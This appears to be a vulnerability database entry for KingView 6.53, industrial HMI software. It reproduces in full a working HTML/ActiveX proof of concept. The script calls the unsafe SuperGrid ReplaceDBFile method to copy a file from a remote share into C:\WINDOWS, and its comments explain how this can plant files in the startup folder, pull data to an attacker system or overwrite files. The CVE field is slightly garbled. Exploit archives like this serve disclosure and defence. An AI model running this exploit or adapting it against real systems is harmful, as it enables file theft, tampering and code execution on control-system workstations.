ID

VAR-E-201309-0194

CVE

EDB ID

28084

TITLE

KingView 6.53 - 'SuperGrid' Insecure ActiveX Control - Windows local Exploit

DESCRIPTION

KingView 6.53 - 'SuperGrid' Insecure ActiveX Control. CVE-97015CVE-2013-6127 . local exploit for Windows platform

AFFECTED PRODUCTS

EXPLOIT

<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>

<input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
var file1 = "\\\\192.168.1.165\\share\\poc.txt"; //source
var file2 = "c:\\WINDOWS\\poc.txt"; //destination
result = target.ReplaceDBFile(file1,file2);
}

</script>

EXPLOIT LANGUAGE

html

PRICE

free

TYPE

'SuperGrid' Insecure ActiveX Control

CREDITS

blake

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:21:57.421000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE